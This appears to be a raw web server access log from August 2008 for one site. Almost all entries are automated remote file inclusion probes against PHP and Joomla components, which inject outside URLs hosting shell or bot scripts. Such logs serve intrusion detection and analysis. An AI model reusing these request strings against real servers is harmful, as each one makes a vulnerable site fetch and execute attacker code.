64.13.225.31 - - [19/Aug/2008:10:39:15 -0700] "GET /logs/access_080521.log//administrator/components/com_bayesiannaivefilter/lang.php?mosConfig_absolute_path=http://x-foto.info/images/idd.txt?? HTTP/1.1" 404 275 "-" "Mozilla/4.8 [en] (Windows NT 5.0; U)" "www.dmulk.com"
200.150.189.10 - - [19/Aug/2008:10:39:29 -0700] "GET /logs/access_080805.log//weather/hw3.php//hw3.php?daysonly=0).include($_GET[file]).(0&file=http://xvascainox7.sites.uol.com.br/id.txt?%0D?? HTTP/1.1" 404 275 "-" "libwww-perl/5.76" "www.dmulk.com"
212.73.82.13 - - [19/Aug/2008:10:40:08 -0700] "GET /logs/access_080324.log//modules/xfsection/modify.php?dir_module=http://mos1.altervista.org/cmd.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.79" "www.dmulk.com"
212.73.82.13 - - [19/Aug/2008:10:40:09 -0700] "GET //modules/xfsection/modify.php?dir_module=http://mos1.altervista.org/cmd.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.79" "www.dmulk.com"
212.73.82.13 - - [19/Aug/2008:10:40:10 -0700] "GET /logs//modules/xfsection/modify.php?dir_module=http://mos1.altervista.org/cmd.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.79" "www.dmulk.com"
64.13.225.31 - - [19/Aug/2008:10:40:21 -0700] "GET //administrator/components/com_bayesiannaivefilter/lang.php?mosConfig_absolute_path=http://x-foto.info/images/idd.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.79" "www.dmulk.com"
69.64.79.59 - - [19/Aug/2008:10:40:26 -0700] "GET //administrator/components/com_bayesiannaivefilter/lang.php?mosConfig_absolute_path=http://yoda3000.de/cache/idd.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.812" "www.dmulk.com"
64.13.225.31 - - [19/Aug/2008:10:40:30 -0700] "GET //administrator/components/com_bayesiannaivefilter/lang.php?mosConfig_absolute_path=http://x-foto.info/images/idd.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.79" "www.dmulk.com"
86.58.154.237 - - [19/Aug/2008:10:40:45 -0700] "GET /logs//includes/mailaccess/pop3.php?CONFIG[pear_dir]=http://www.latinoconvention.com/mambots/system/.sys/.../safe.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.79" "www.dmulk.com"
86.58.154.237 - - [19/Aug/2008:10:40:46 -0700] "GET //includes/mailaccess/pop3.php?CONFIG[pear_dir]=http://www.latinoconvention.com/mambots/system/.sys/.../safe.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.79" "www.dmulk.com"
64.13.225.31 - - [19/Aug/2008:10:41:04 -0700] "GET /logs/access_080706.log/components/com_colorlab/admin.color.php?mosConfig_live_site=http://x-foto.info/images/idd.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.79" "www.dmulk.com"
212.227.65.79 - - [19/Aug/2008:10:41:12 -0700] "GET /logs//admin/frontpage_right.php?loadadminpage=http://pediatric-neurology-paris.net/media/install_41aca995b9171/patch/includes/vsc/botid.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.76" "www.dmulk.com"
212.227.65.79 - - [19/Aug/2008:10:41:13 -0700] "GET //admin/frontpage_right.php?loadadminpage=http://pediatric-neurology-paris.net/media/install_41aca995b9171/patch/includes/vsc/botid.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.76" "www.dmulk.com"
213.236.10.71 - - [19/Aug/2008:10:41:25 -0700] "GET /logs//s_loadenv.inc.php?DOCUMENT_ROOT=http://benevolenceguild.net/raid/plugins/java??? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "www.dmulk.com"
213.236.10.71 - - [19/Aug/2008:10:41:25 -0700] "GET //s_loadenv.inc.php?DOCUMENT_ROOT=http://benevolenceguild.net/raid/plugins/java??? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "www.dmulk.com"
64.13.225.31 - - [19/Aug/2008:10:41:31 -0700] "GET /logs/access_080706.log/components/com_colorlab/admin.color.php?mosConfig_live_site=http://x-foto.info/images/idd.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.79" "www.dmulk.com"
64.13.225.31 - - [19/Aug/2008:10:41:31 -0700] "GET /logs/access_080706.log/components/com_colorlab/admin.color.php?mosConfig_live_site=http://x-foto.info/images/idd.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.79" "www.dmulk.com"
216.153.33.182 - - [19/Aug/2008:10:41:33 -0700] "GET /logs/access_080706.log/errors.php?error=http://h1.ripway.com/wilna/id.txt??? HTTP/1.1" 404 275 "-" "libwww-perl/5.803" "www.dmulk.com"
216.153.33.182 - - [19/Aug/2008:10:41:33 -0700] "GET /errors.php?error=http://h1.ripway.com/wilna/id.txt??? HTTP/1.1" 404 275 "-" "libwww-perl/5.803" "www.dmulk.com"
216.153.33.182 - - [19/Aug/2008:10:41:33 -0700] "GET /logs/errors.php?error=http://h1.ripway.com/wilna/id.txt??? HTTP/1.1" 404 275 "-" "libwww-perl/5.803" "www.dmulk.com"
89.208.43.121 - - [19/Aug/2008:10:41:36 -0700] "GET /logs/access_080702.log/errors.php?error=http://yoda3000.de/cache/idd.txt?? HTTP/1.1" 404 275 "-" "Mozilla/4.8 [en] (Windows NT 5.0; U)" "www.dmulk.com"
89.208.43.121 - - [19/Aug/2008:10:41:36 -0700] "GET /errors.php?error=http://yoda3000.de/cache/idd.txt?? HTTP/1.1" 404 275 "-" "Mozilla/4.8 [en] (Windows NT 5.0; U)" "www.dmulk.com"
89.108.66.188 - - [19/Aug/2008:10:41:48 -0700] "GET /logs/access_080706.log/components/com_colorlab/admin.color.php?mosConfig_live_site=http://x-foto.info/images/idd.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.812" "www.dmulk.com"
64.13.225.31 - - [19/Aug/2008:10:42:01 -0700] "GET /logs/access_080516.log//administrator/components/com_bayesiannaivefilter/lang.php?mosConfig_absolute_path=http://x-foto.info/images/idd.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.79" "www.dmulk.com"
64.13.225.31 - - [19/Aug/2008:10:42:01 -0700] "GET //administrator/components/com_bayesiannaivefilter/lang.php?mosConfig_absolute_path=http://x-foto.info/images/idd.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.79" "www.dmulk.com"
64.13.225.31 - - [19/Aug/2008:10:42:01 -0700] "GET /logs//administrator/components/com_bayesiannaivefilter/lang.php?mosConfig_absolute_path=http://x-foto.info/images/idd.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.79" "www.dmulk.com"
64.13.225.31 - - [19/Aug/2008:10:42:06 -0700] "GET /logs/access_080518.log//administrator/components/com_bayesiannaivefilter/lang.php?mosConfig_absolute_path=http://x-foto.info/images/idd.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.79" "www.dmulk.com"
89.108.66.188 - - [19/Aug/2008:10:42:08 -0700] "GET /logs/access_080706.log/components/com_colorlab/admin.color.php?mosConfig_live_site=http://x-foto.info/images/idd.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.812" "www.dmulk.com"
69.64.79.59 - - [19/Aug/2008:10:42:10 -0700] "GET /logs/access_080516.log//administrator/components/com_bayesiannaivefilter/lang.php?mosConfig_absolute_path=http://yoda3000.de/cache/idd.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.812" "www.dmulk.com"
69.64.79.59 - - [19/Aug/2008:10:42:10 -0700] "GET //administrator/components/com_bayesiannaivefilter/lang.php?mosConfig_absolute_path=http://yoda3000.de/cache/idd.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.812" "www.dmulk.com"
69.64.79.59 - - [19/Aug/2008:10:42:11 -0700] "GET /logs//administrator/components/com_bayesiannaivefilter/lang.php?mosConfig_absolute_path=http://yoda3000.de/cache/idd.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.812" "www.dmulk.com"
89.208.43.121 - - [19/Aug/2008:10:42:12 -0700] "GET /logs/access_080702.log/phpSecurePages/secure.php?&cfgProgDir=http://yoda3000.de/cache/idd.txt?? HTTP/1.1" 404 275 "-" "Mozilla/4.8 [en] (Windows NT 5.0; U)" "www.dmulk.com"
89.208.43.121 - - [19/Aug/2008:10:42:12 -0700] "GET /phpSecurePages/secure.php?&cfgProgDir=http://yoda3000.de/cache/idd.txt?? HTTP/1.1" 404 275 "-" "Mozilla/4.8 [en] (Windows NT 5.0; U)" "www.dmulk.com"
69.64.79.59 - - [19/Aug/2008:10:42:17 -0700] "GET /logs/access_080518.log//administrator/components/com_bayesiannaivefilter/lang.php?mosConfig_absolute_path=http://yoda3000.de/cache/idd.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.812" "www.dmulk.com"
200.150.189.10 - - [19/Aug/2008:10:42:26 -0700] "GET /logs/access_080805.log//modules/xfsection/modify.php?dir_module=http://xvascainox7.sites.uol.com.br/id.txt?%0D?? HTTP/1.1" 404 275 "-" "libwww-perl/5.76" "www.dmulk.com"
89.208.43.121 - - [19/Aug/2008:10:42:32 -0700] "GET /logs/access_080720.log//skin/zero_vote/error.php?dir=http://albforum.freehostia.com/help01.txt??? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "www.dmulk.com"
89.208.43.121 - - [19/Aug/2008:10:42:32 -0700] "GET /logs//skin/zero_vote/error.php?dir=http://albforum.freehostia.com/help01.txt??? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "www.dmulk.com"
89.208.43.121 - - [19/Aug/2008:10:42:32 -0700] "GET //skin/zero_vote/error.php?dir=http://albforum.freehostia.com/help01.txt??? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "www.dmulk.com"
64.13.225.31 - - [19/Aug/2008:10:42:48 -0700] "GET /logs/access_080516.log//administrator/components/com_bayesiannaivefilter/lang.php?mosConfig_absolute_path=http://x-foto.info/images/idd.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.79" "www.dmulk.com"
64.13.225.31 - - [19/Aug/2008:10:42:48 -0700] "GET //administrator/components/com_bayesiannaivefilter/lang.php?mosConfig_absolute_path=http://x-foto.info/images/idd.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.79" "www.dmulk.com"
64.13.225.31 - - [19/Aug/2008:10:42:48 -0700] "GET /logs//administrator/components/com_bayesiannaivefilter/lang.php?mosConfig_absolute_path=http://x-foto.info/images/idd.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.79" "www.dmulk.com"
64.13.225.31 - - [19/Aug/2008:10:42:52 -0700] "GET /logs/access_080518.log//administrator/components/com_bayesiannaivefilter/lang.php?mosConfig_absolute_path=http://x-foto.info/images/idd.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.79" "www.dmulk.com"
69.64.79.59 - - [19/Aug/2008:10:42:55 -0700] "GET /logs/access_080706.log/components/com_colorlab/admin.color.php?mosConfig_live_site=http://yoda3000.de/cache/idd.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.812" "www.dmulk.com"
69.64.79.59 - - [19/Aug/2008:10:42:59 -0700] "GET /logs/access_080127.log//mvcw.php?step=1&vwar_root=http://yoda3000.de/cache/idd.txt?? HTTP/1.1" 404 275 "-" "Mozilla/4.8 [en] (Windows NT 5.0; U)" "www.dmulk.com"
69.64.79.59 - - [19/Aug/2008:10:42:59 -0700] "GET //mvcw.php?step=1&vwar_root=http://yoda3000.de/cache/idd.txt?? HTTP/1.1" 404 275 "-" "Mozilla/4.8 [en] (Windows NT 5.0; U)" "www.dmulk.com"
81.26.215.28 - - [19/Aug/2008:10:42:59 -0700] "GET /logs/access_080127.log//mvcw.php?step=1&vwar_root=http://x-foto.info/images/idd.txt?? HTTP/1.1" 404 275 "-" "Mozilla/4.8 [en] (Windows NT 5.0; U)" "www.dmulk.com"
81.26.215.28 - - [19/Aug/2008:10:42:59 -0700] "GET //mvcw.php?step=1&vwar_root=http://x-foto.info/images/idd.txt?? HTTP/1.1" 404 275 "-" "Mozilla/4.8 [en] (Windows NT 5.0; U)" "www.dmulk.com"
69.64.79.59 - - [19/Aug/2008:10:43:13 -0700] "GET /logs/access_080127.log//mvcw.php?step=1&vwar_root=http://yoda3000.de/cache/idd.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.812" "www.dmulk.com"
81.26.215.28 - - [19/Aug/2008:10:43:16 -0700] "GET /logs/access_080127.log//mvcw.php?step=1&vwar_root=http://x-foto.info/images/idd.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.65" "www.dmulk.com"
69.64.79.59 - - [19/Aug/2008:10:43:16 -0700] "GET //mvcw.php?step=1&vwar_root=http://yoda3000.de/cache/idd.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.812" "www.dmulk.com"
69.64.79.59 - - [19/Aug/2008:10:43:16 -0700] "GET /logs//mvcw.php?step=1&vwar_root=http://yoda3000.de/cache/idd.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.812" "www.dmulk.com"
81.26.215.28 - - [19/Aug/2008:10:43:16 -0700] "GET //mvcw.php?step=1&vwar_root=http://x-foto.info/images/idd.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.65" "www.dmulk.com"
69.64.79.59 - - [19/Aug/2008:10:43:16 -0700] "GET /logs/access_080114.log//mvcw.php?step=1&vwar_root=http://yoda3000.de/cache/idd.txt?? HTTP/1.1" 404 275 "-" "Mozilla/4.8 [en] (Windows NT 5.0; U)" "www.dmulk.com"
81.26.215.28 - - [19/Aug/2008:10:43:17 -0700] "GET /logs//mvcw.php?step=1&vwar_root=http://x-foto.info/images/idd.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.65" "www.dmulk.com"
69.46.23.105 - - [19/Aug/2008:10:43:22 -0700] "GET /logs/access_080227.log//?path%5Bdocroot%5D=http://www.ulisse-bici.org/tb1tl33.txt???? HTTP/1.1" 404 275 "-" "Mozilla/5.0 (compatible; Konqueror/3.1-rc3; i686 Linux; 20020515)" "www.dmulk.com"
69.46.23.105 - - [19/Aug/2008:10:43:23 -0700] "GET /logs//?path%5Bdocroot%5D=http://www.ulisse-bici.org/tb1tl33.txt???? HTTP/1.1" 200 61289 "-" "Mozilla/5.0 (compatible; Konqueror/3.1-rc3; i686 Linux; 20020515)" "www.dmulk.com"
69.46.23.105 - - [19/Aug/2008:10:43:23 -0700] "GET /logs/access_080717.log//?path%5Bdocroot%5D=http://www.ulisse-bici.org/tb1tl33.txt???? HTTP/1.1" 404 275 "-" "Mozilla/5.0 (compatible; Konqueror/3.1-rc3; i686 Linux; 20020515)" "www.dmulk.com"
69.46.23.105 - - [19/Aug/2008:10:43:23 -0700] "GET //?path%5Bdocroot%5D=http://www.ulisse-bici.org/tb1tl33.txt???? HTTP/1.1" 200 9890 "-" "Mozilla/5.0 (compatible; Konqueror/3.1-rc3; i686 Linux; 20020515)" "www.dmulk.com"
81.26.215.28 - - [19/Aug/2008:10:43:31 -0700] "GET /logs/access_080114.log//mvcw.php?step=1&vwar_root=http://x-foto.info/images/idd.txt?? HTTP/1.1" 404 275 "-" "Mozilla/4.8 [en] (Windows NT 5.0; U)" "www.dmulk.com"
216.153.33.182 - - [19/Aug/2008:10:43:36 -0700] "GET /logs/access_080415.log/errors.php?error=http://h1.ripway.com/wilna/id.txt??? HTTP/1.1" 404 275 "-" "libwww-perl/5.803" "www.dmulk.com"
89.208.43.121 - - [19/Aug/2008:10:43:36 -0700] "GET /errors.php?error=http://yoda3000.de/cache/idd.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "www.dmulk.com"
89.208.43.121 - - [19/Aug/2008:10:43:41 -0700] "GET /phpSecurePages/secure.php?&cfgProgDir=http://yoda3000.de/cache/idd.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "www.dmulk.com"
69.64.79.59 - - [19/Aug/2008:10:43:43 -0700] "GET /logs/access_080114.log//mvcw.php?step=1&vwar_root=http://yoda3000.de/cache/idd.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.812" "www.dmulk.com"
217.160.176.60 - - [19/Aug/2008:10:43:44 -0700] "GET /components/com_mtree/Savant2/Savant2_Plugin_textarea.php?mosConfig_absolute_path=http://www.skilful.nu/images/id.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "www.dmulk.com"
81.26.215.28 - - [19/Aug/2008:10:43:48 -0700] "GET /logs/access_080114.log//mvcw.php?step=1&vwar_root=http://x-foto.info/images/idd.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.65" "www.dmulk.com"
75.69.246.191 - - [19/Aug/2008:10:44:38 -0700] "GET //index.php?option=com_lurm_constructor&Itemid=&mosConfig_absolute_path=http://x-foto.info/images/idd.txt?? HTTP/1.1" 200 9932 "-" "libwww-perl/5.79" "www.dmulk.com"
75.69.246.191 - - [19/Aug/2008:10:44:38 -0700] "GET /logs//index.php?option=com_lurm_constructor&Itemid=&mosConfig_absolute_path=http://x-foto.info/images/idd.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.79" "www.dmulk.com"
217.172.182.209 - - [19/Aug/2008:10:44:47 -0700] "GET /logs//admin/frontpage_right.php?loadadminpage=http://pediatric-neurology-paris.net/media/install_41aca995b9171/patch/includes/vsc/botid.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.803" "www.dmulk.com"
217.172.182.209 - - [19/Aug/2008:10:44:48 -0700] "GET //admin/frontpage_right.php?loadadminpage=http://pediatric-neurology-paris.net/media/install_41aca995b9171/patch/includes/vsc/botid.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.803" "www.dmulk.com"
66.135.41.76 - - [19/Aug/2008:10:44:55 -0700] "GET /logs//s_loadenv.inc.php?DOCUMENT_ROOT=http://afe.la/id.txt??? HTTP/1.1" 404 275 "-" "libwww-perl/5.810" "www.dmulk.com"
66.135.41.76 - - [19/Aug/2008:10:44:55 -0700] "GET //s_loadenv.inc.php?DOCUMENT_ROOT=http://afe.la/id.txt??? HTTP/1.1" 404 275 "-" "libwww-perl/5.810" "www.dmulk.com"
89.111.176.11 - - [19/Aug/2008:10:44:59 -0700] "GET /logs//?path%5Bdocroot%5D=http://x-foto.info/images/idd.txt?? HTTP/1.1" 200 61289 "-" "libwww-perl/5.805" "www.dmulk.com"
89.111.176.11 - - [19/Aug/2008:10:45:02 -0700] "GET //?path%5Bdocroot%5D=http://x-foto.info/images/idd.txt?? HTTP/1.1" 200 9881 "-" "libwww-perl/5.805" "www.dmulk.com"
66.135.41.76 - - [19/Aug/2008:10:45:05 -0700] "GET /logs//s_loadenv.inc.php?DOCUMENT_ROOT=http://afe.la/id.txt??? HTTP/1.1" 404 275 "-" "libwww-perl/5.810" "www.dmulk.com"
66.135.41.76 - - [19/Aug/2008:10:45:05 -0700] "GET //s_loadenv.inc.php?DOCUMENT_ROOT=http://afe.la/id.txt??? HTTP/1.1" 404 275 "-" "libwww-perl/5.810" "www.dmulk.com"
216.153.33.182 - - [19/Aug/2008:10:45:13 -0700] "GET /phpSecurePages/secure.php?&cfgProgDir=http://h1.ripway.com/wilna/id.txt??? HTTP/1.1" 404 275 "-" "libwww-perl/5.803" "www.dmulk.com"
69.64.79.59 - - [19/Aug/2008:10:45:15 -0700] "GET //mvcw.php?step=1&vwar_root=http://yoda3000.de/cache/idd.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.812" "www.dmulk.com"
212.227.65.79 - - [19/Aug/2008:10:45:32 -0700] "GET /logs//admin/frontpage_right.php?loadadminpage=http://www.degeheimedienst.nl/dgd/include/inc_act/sistcmd.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.76" "www.dmulk.com"
212.227.65.79 - - [19/Aug/2008:10:45:32 -0700] "GET //admin/frontpage_right.php?loadadminpage=http://www.degeheimedienst.nl/dgd/include/inc_act/sistcmd.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.76" "www.dmulk.com"
69.64.51.36 - - [19/Aug/2008:10:45:58 -0700] "GET /logs/access_080227.log//?path%5Bdocroot%5D=http://afe.la/id.txt??? HTTP/1.1" 404 275 "-" "libwww-perl/5.79" "www.dmulk.com"
69.64.51.36 - - [19/Aug/2008:10:45:58 -0700] "GET /logs//?path%5Bdocroot%5D=http://afe.la/id.txt??? HTTP/1.1" 200 61289 "-" "libwww-perl/5.79" "www.dmulk.com"
69.64.51.36 - - [19/Aug/2008:10:46:01 -0700] "GET //?path%5Bdocroot%5D=http://afe.la/id.txt??? HTTP/1.1" 200 9869 "-" "libwww-perl/5.79" "www.dmulk.com"
86.58.154.237 - - [19/Aug/2008:10:46:21 -0700] "GET /logs/access_080621.log//index.php?_REQUEST=&_REQUEST[option]=option,com_comprofiler&_REQUEST[Itemid]=1&GLOBALS=&mosConfig_absolute_path=http://www.latinoconvention.com/mambots/system/.sys/.../safe.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.79" "www.dmulk.com"
67.19.51.194 - - [19/Aug/2008:10:46:22 -0700] "GET /index2.php?DoAction=http://www.teampaulc.org/modules/Forums/admin/lajelid.txt??? HTTP/1.1" 404 275 "-" "libwww-perl/5.79" "www.dmulk.com"
67.19.51.194 - - [19/Aug/2008:10:46:35 -0700] "GET /logs/access_080804.log/index2.php?DoAction=http://www.teampaulc.org/modules/Forums/admin/lajelid.txt??? HTTP/1.1" 404 275 "-" "libwww-perl/5.79" "www.dmulk.com"
67.19.51.194 - - [19/Aug/2008:10:46:35 -0700] "GET /logs/access_080704.log/index2.php?DoAction=http://www.teampaulc.org/modules/Forums/admin/lajelid.txt??? HTTP/1.1" 404 275 "-" "libwww-perl/5.79" "www.dmulk.com"
67.19.51.194 - - [19/Aug/2008:10:46:36 -0700] "GET /logs/index2.php?DoAction=http://www.teampaulc.org/modules/Forums/admin/lajelid.txt??? HTTP/1.1" 404 275 "-" "libwww-perl/5.79" "www.dmulk.com"
69.64.51.36 - - [19/Aug/2008:10:46:36 -0700] "GET /logs/access_080410.log//?path%5Bdocroot%5D=http://afe.la/id.txt??? HTTP/1.1" 404 275 "-" "libwww-perl/5.79" "www.dmulk.com"
75.126.163.35 - - [19/Aug/2008:10:46:55 -0700] "GET /logs//admin/frontpage_right.php?loadadminpage=http://www.geoduck.org/cache/cmd7.gif?? HTTP/1.1" 404 275 "-" "Mozilla/4.7C-CCK-MCD {C-UDP; EBM-APPLE} (Macintosh; I; PPC)" "www.dmulk.com"
75.126.163.35 - - [19/Aug/2008:10:46:55 -0700] "GET //admin/frontpage_right.php?loadadminpage=http://www.geoduck.org/cache/cmd7.gif?? HTTP/1.1" 404 275 "-" "Mozilla/4.7C-CCK-MCD {C-UDP; EBM-APPLE} (Macintosh; I; PPC)" "www.dmulk.com"
89.208.43.121 - - [19/Aug/2008:10:46:55 -0700] "GET /logs/access_080630.log/phpSecurePages/secure.php?&cfgProgDir=http://albforum.freehostia.com/help01.txt??? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "www.dmulk.com"
89.208.43.121 - - [19/Aug/2008:10:46:55 -0700] "GET /phpSecurePages/secure.php?&cfgProgDir=http://albforum.freehostia.com/help01.txt??? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "www.dmulk.com"
64.13.225.31 - - [19/Aug/2008:10:46:56 -0700] "GET /logs/access_080412.log//administrator/components/com_bayesiannaivefilter/lang.php?mosConfig_absolute_path=http://x-foto.info/images/idd.txt?? HTTP/1.1" 404 275 "-" "Mozilla/4.8 [en] (Windows NT 5.0; U)" "www.dmulk.com"
64.13.225.31 - - [19/Aug/2008:10:46:56 -0700] "GET //administrator/components/com_bayesiannaivefilter/lang.php?mosConfig_absolute_path=http://x-foto.info/images/idd.txt?? HTTP/1.1" 404 275 "-" "Mozilla/4.8 [en] (Windows NT 5.0; U)" "www.dmulk.com"
64.13.225.31 - - [19/Aug/2008:10:46:57 -0700] "GET /logs/access_080521.log//administrator/components/com_bayesiannaivefilter/lang.php?mosConfig_absolute_path=http://x-foto.info/images/idd.txt?? HTTP/1.1" 404 275 "-" "Mozilla/4.8 [en] (Windows NT 5.0; U)" "www.dmulk.com"
89.208.43.121 - - [19/Aug/2008:10:46:57 -0700] "GET /logs/phpSecurePages/secure.php?&cfgProgDir=http://albforum.freehostia.com/help01.txt??? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "www.dmulk.com"
89.208.43.121 - - [19/Aug/2008:10:46:59 -0700] "GET /logs/access_080324.log//skin/zero_vote/error.php?dir=http://albforum.freehostia.com/help01.txt??? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "www.dmulk.com"
89.208.43.121 - - [19/Aug/2008:10:47:08 -0700] "GET //skin/zero_vote/error.php?dir=http://albforum.freehostia.com/help01.txt??? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "www.dmulk.com"
89.208.43.121 - - [19/Aug/2008:10:47:15 -0700] "GET /logs/access_080630.log/errors.php?error=http://albforum.freehostia.com/help01.txt??? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "www.dmulk.com"
89.208.43.121 - - [19/Aug/2008:10:47:17 -0700] "GET /errors.php?error=http://albforum.freehostia.com/help01.txt??? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "www.dmulk.com"
89.208.43.121 - - [19/Aug/2008:10:47:17 -0700] "GET /logs/errors.php?error=http://albforum.freehostia.com/help01.txt??? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "www.dmulk.com"
66.135.41.76 - - [19/Aug/2008:10:47:20 -0700] "GET /logs//?path%5Bdocroot%5D=http://afe.la/id.txt??? HTTP/1.1" 200 61289 "-" "libwww-perl/5.810" "www.dmulk.com"
66.135.41.76 - - [19/Aug/2008:10:47:21 -0700] "GET //?path%5Bdocroot%5D=http://afe.la/id.txt??? HTTP/1.1" 200 9869 "-" "libwww-perl/5.810" "www.dmulk.com"
82.194.76.177 - - [19/Aug/2008:10:47:26 -0700] "GET /logs/access_080315.log%20//common/db.php?commonpath=http://www.hatcon.com.sa/phpnuke/ultramode.txt??? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "www.dmulk.com"
82.194.76.177 - - [19/Aug/2008:10:47:26 -0700] "GET /logs//common/db.php?commonpath=http://www.hatcon.com.sa/phpnuke/ultramode.txt??? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "www.dmulk.com"
82.194.76.177 - - [19/Aug/2008:10:47:27 -0700] "GET //common/db.php?commonpath=http://www.hatcon.com.sa/phpnuke/ultramode.txt??? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "www.dmulk.com"
213.92.85.234 - - [19/Aug/2008:10:47:45 -0700] "GET /logs/access_080724.log%20//mwchat/libs/start_lobby.php?CONFIG[MWCHAT_Libs]=http://clubmusic.caucasus.net/V7ID.txt%0D?? HTTP/1.1" 404 275 "-" "libwww-perl/5.811" "www.dmulk.com"
89.111.176.11 - - [19/Aug/2008:10:47:45 -0700] "GET /logs//?path%5Bdocroot%5D=http://x-foto.info/images/idd.txt?? HTTP/1.1" 200 61289 "-" "libwww-perl/5.805" "www.dmulk.com"
89.111.176.11 - - [19/Aug/2008:10:47:47 -0700] "GET //?path%5Bdocroot%5D=http://x-foto.info/images/idd.txt?? HTTP/1.1" 200 9881 "-" "libwww-perl/5.805" "www.dmulk.com"
74.6.22.125 - - [19/Aug/2008:10:47:49 -0700] "GET /logs/access_080606.log HTTP/1.0" 200 786432 "-" "Mozilla/5.0 (compatible; Yahoo! Slurp; http://help.yahoo.com/help/us/ysearch/slurp)" "www.dmulk.com"
64.13.225.31 - - [19/Aug/2008:10:47:54 -0700] "GET /logs/access_080516.log//administrator/components/com_bayesiannaivefilter/lang.php?mosConfig_absolute_path=http://x-foto.info/images/idd.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.79" "www.dmulk.com"
64.13.225.31 - - [19/Aug/2008:10:47:54 -0700] "GET //administrator/components/com_bayesiannaivefilter/lang.php?mosConfig_absolute_path=http://x-foto.info/images/idd.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.79" "www.dmulk.com"
64.13.225.31 - - [19/Aug/2008:10:47:54 -0700] "GET /logs//administrator/components/com_bayesiannaivefilter/lang.php?mosConfig_absolute_path=http://x-foto.info/images/idd.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.79" "www.dmulk.com"
64.13.225.31 - - [19/Aug/2008:10:47:59 -0700] "GET /logs/access_080518.log//administrator/components/com_bayesiannaivefilter/lang.php?mosConfig_absolute_path=http://x-foto.info/images/idd.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.79" "www.dmulk.com"
203.149.62.160 - - [19/Aug/2008:10:48:06 -0700] "GET /logs/port.php?content=http://xvascainox7.sites.uol.com.br/v6.txt?%0D?? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "www.dmulk.com"
89.208.43.121 - - [19/Aug/2008:10:48:29 -0700] "GET /logs/access_080630.log/errors.php?error=http://yoda3000.de/cache/idd.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "www.dmulk.com"
89.208.43.121 - - [19/Aug/2008:10:48:29 -0700] "GET /errors.php?error=http://yoda3000.de/cache/idd.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "www.dmulk.com"
